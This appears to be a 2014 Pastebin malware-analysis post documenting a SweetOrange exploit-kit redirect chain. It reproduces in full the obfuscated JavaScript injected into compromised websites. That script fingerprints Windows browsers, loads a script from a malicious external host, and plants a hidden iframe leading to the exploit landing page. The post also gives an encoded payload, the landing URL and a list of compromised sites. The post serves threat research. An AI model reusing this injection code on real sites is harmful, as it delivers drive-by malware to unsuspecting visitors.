Advertisement
malwageddon

SweetOrange EK redirect chain example - 2014-06/07

Jul 3rd, 2014
354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // The following JS code has been seen injected into other Java Scripts on compromised websites
  2.  
  3. /* PjN4bD7k7tLFnVmgT7Cz */
  4. var qzQtTI = "useridA0817FB25";
  5. var PdfwG = "28";
  6. var NbUcmN = 1;
  7.  
  8. function ytLAm7(ExRd6H) {
  9.     var otvobS;
  10.     var viRKc8J = document.cookie;
  11.     if (!viRKc8J) {
  12.         return null;
  13.     }
  14.     viRKc8J = viRKc8J.replace(/\s/g, "");
  15.     var Q7CHJu = viRKc8J.split(";");
  16.     for (var i = 0; i < Q7CHJu.length; i++) {
  17.         var HpojhA = Q7CHJu[i].split("=");
  18.         if (HpojhA[0] == ExRd6H) {
  19.             otvobS = unescape(HpojhA[1]);
  20.             break;
  21.         }
  22.     }
  23.     return otvobS;
  24. };
  25.  
  26. function sLS1uOJ(ExRd6H, UTlda6n, kPBDO) {
  27.     var exp = new Date();
  28.     var IuhFf = exp.getTime() + (kPBDO * 60 * 60 * 1000);
  29.     exp.setTime(IuhFf);
  30.     var p2rahA2 = ExRd6H + "=" + escape(UTlda6n) + "; expires=" + exp.toGMTString() + "; domain=" + document.domain;
  31.     document.cookie = p2rahA2;
  32. };
  33.  
  34. function oQybCm() {
  35.     sLS1uOJ(qzQtTI, PdfwG, 48);
  36. };
  37.  
  38. function ws7old() {
  39.     try {
  40.         CcdzJE = "KkKFOooO0cd2";
  41.         if (jquery_datepicker.length == 0) {
  42.             sLS1uOJ(qzQtTI, PdfwG, 48);
  43.             return;
  44.         }
  45.         try {
  46.             if (document.getElementById(CcdzJE)) {
  47.                 document.getElementById(CcdzJE).parentNode.removeChild(document.getElementById(CcdzJE));
  48.             }
  49.         } catch (e) {};
  50.         var AF4G2 = unescape(jquery_datepicker.replace(/[g-zG-Z]+/g, "").replace(/[=\-!@$;.,]+/g, "%"));
  51.         var O2gGJP5 = document.createElement("DIV");
  52.         O2gGJP5.id = CcdzJE;
  53.         O2gGJP5.style.cssText = "position:absolute;left:0px;top:200px;opacity:0;filter:alpha(opacity=0);";
  54.         O2gGJP5.innerHTML = "<iframe onload='oQybCm();' src='" + AF4G2 + "' width=19 height=19 frameborder=0 scrolling='no'></iframe>";
  55.         document.body.appendChild(O2gGJP5);
  56.     } catch (e) {
  57.         setTimeout("ws7old()", 300);
  58.     }
  59. };
  60.  
  61. function OEhGaU() {
  62.     var uNHdM9f, iUGRl = "KHncdu2de343";
  63.     try {
  64.         if (document.getElementById(iUGRl)) {
  65.             document.getElementById(iUGRl).parentNode.removeChild(document.getElementById(iUGRl));
  66.         }
  67.         uNHdM9f = document.createElement("SCRIPT");
  68.         uNHdM9f.type = "text/javascript";
  69.         uNHdM9f.id = iUGRl;
  70.         if (uNHdM9f.readyState) {
  71.             uNHdM9f.onreadystatechange = function () {
  72.                 if (this.readyState == "loaded" || this.readyState == "complete") {
  73.                     uNHdM9f.onreadystatechange = null;
  74.                     ws7old();
  75.                 }
  76.             };
  77.         } else {
  78.             uNHdM9f.onload = function () {
  79.                 ws7old();
  80.             };
  81.         }
  82.         uNHdM9f.src = "http://cdn2.movetoclarksville.com/k?t=" + Math.floor(Math.random() * 4294967295);
  83.         if (document.getElementsByTagName("head").length > 0) {
  84.             document.getElementsByTagName("head")[0].appendChild(uNHdM9f);
  85.         } else {
  86.             document.getElementsByTagName("body")[0].appendChild(uNHdM9f);
  87.         }
  88.     } catch (e) {
  89.         setTimeout("OEhGaU()", 300);
  90.     }
  91. };
  92.  
  93. function iuw38Bx() {
  94.     var hIEo3 = navigator.userAgent;
  95.     var huOUD7n = 0;
  96.     if (hIEo3.indexOf("Windows") == -1 || (hIEo3.indexOf("MSIE") == -1 && hIEo3.indexOf("Gecko/") == -1 && hIEo3.indexOf("Trident") == -1)) {
  97.         return 0;
  98.     }
  99.     try {
  100.         if (NbUcmN) {
  101.             try {
  102.                 if (ytLAm7(qzQtTI) == PdfwG) {
  103.                     return false;
  104.                 }
  105.             } catch (e) {};
  106.         }
  107.         if (hIEo3.indexOf("MSIE") != -1 || hIEo3.indexOf("Trident") != -1) {
  108.             try {
  109.                 huOUD7n = AdLlLVU();
  110.  
  111.                 function AdLlLVU() {
  112.                     return 0;
  113.                 }
  114.             } catch (e) {
  115.                 huOUD7n = 1;
  116.             }
  117.         }
  118.     } catch (e) {};
  119.     if (huOUD7n == 0) {
  120.         OEhGaU();
  121.     }
  122. };
  123. iuw38Bx(); /* 5BbjUoP6mAAMqzPV */
  124.  
  125. // If the required conditions are met, the script will redirect the browser to 'cdn2.movetoclarksville.com'. Example:
  126. //
  127. // cdn2.movetoclarksville.com/k?t=3273935373
  128. // the number at the end is random
  129. // the response will be a variable declaration that is later used by the main JS. Example of the response:
  130.  
  131. var jquery_datepicker='I;X68=g74.7k4-7V0K=3aL=2fj-k2fJ@63i@64q-J6eJ-2ey!6w1$h6l8=O6X1g.g6rd@61L!O7Z4j,w6o5!72!O6w9h.O6N1=6HcG=7T3,2Hel-6ufO@j72H@u67-3a!3Q1$36=3n1Q;32U$Y3N2-2f.7L0!W7h2!T6fR@6Q4;7I5l.m63,7K4@W7o3=M2f-W77H!6i5.6u2;7O3$6N9S-7O4v.R65J@z7g3y.2f$7j3!P65=K63@Z2Rfr=7M3@m7Z4h!V6y1!x7I2$i67!M6I1.P6cQ$r6v1;O78@7p9-2ie,k70i.6N8-7y0w;Q3fk.6e.s6v5I@t6N2o@J7S5I-6xc!6r1.3dm=3t3';
  132.  
  133. // once processed will result in a URL leading to SweetOrange EK landing page. Example:
  134.  
  135. http://cdn.ahamaterials.org:16122/products/websites/sec/stargalaxy.php?nebula=3
  136.  
  137. // some of the examples of URLs seen performing redirects to 'cdn2.movetoclarksville.com'. Redirects started appearing on my radar at the beginning of June 2014.
  138.  
  139. http://dontmakemenuts.com/2013/07/ulta-beauty-living-proof-frizz-free-friday-complimentary-blowout/
  140. http://dukeupdate.com/
  141. http://interiordesignable.com/layout-for-your-next-the-actual-and-new-guest-bathroom/
  142. http://interiordesignable.com/simple-decoration-kids-room-ideas-best/
  143. http://interiordesignable.com/zen-bathroom-decor-for-the-home/
  144. http://jcpa.org/Jcpa/VHeadlines.asp?width=200&height=70&bacgroundColor=FFFFFF&textColor=000000&delay=4000
  145. http://joyfulhomemaking.com/2012/04/quinoa-chicken-sweet-potato-stew.html
  146. http://smokeybones.com/
  147. http://smokeybones.com/locations/
  148. http://www.aquariumdrunkard.com/2014/06/30/gilbert-osullivan-alone-again-naturally/
  149. http://www.conestogalogcabins.com/
  150. http://www.consultingcase101.com/mckinsey-assesses-management-consulting-industry/
  151. http://www.fitness19.com/what-length-of-workout-is-best/
  152. http://www.genesistoday.com/
  153. http://www.graciebarra.com/2013/05/look-and-feel-like-a-champ-by-knowing-how-to-tie-your-belt/
  154. http://www.graciebarra.com/georgia
  155. http://www.grrlpowercomic.com/archives/1053
  156. http://www.handicappedpets.com/walkin-wheels-rear-harness
  157. http://www.newmansown.com/
  158. http://www.newmansown.com/foodQA.aspx
  159. http://www.oakinv.com/
  160. http://www.oakvc.com/
  161. http://www.oakvc.com/investments-portfolio-overview
  162. http://www.techjournal.org/2013/04/geo-targeting-nabs-one-in-five-smartphone-users/
  163. http://www.whichwich.com/
  164. http://www.whichwich.com/content/durham-north-carolina-you-get-new-which-wich-today
  165. http://www.whichwich.com/locations
  166. http://www.whichwich.com/menu
  167. http://www.whichwich.com/online_ordering/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement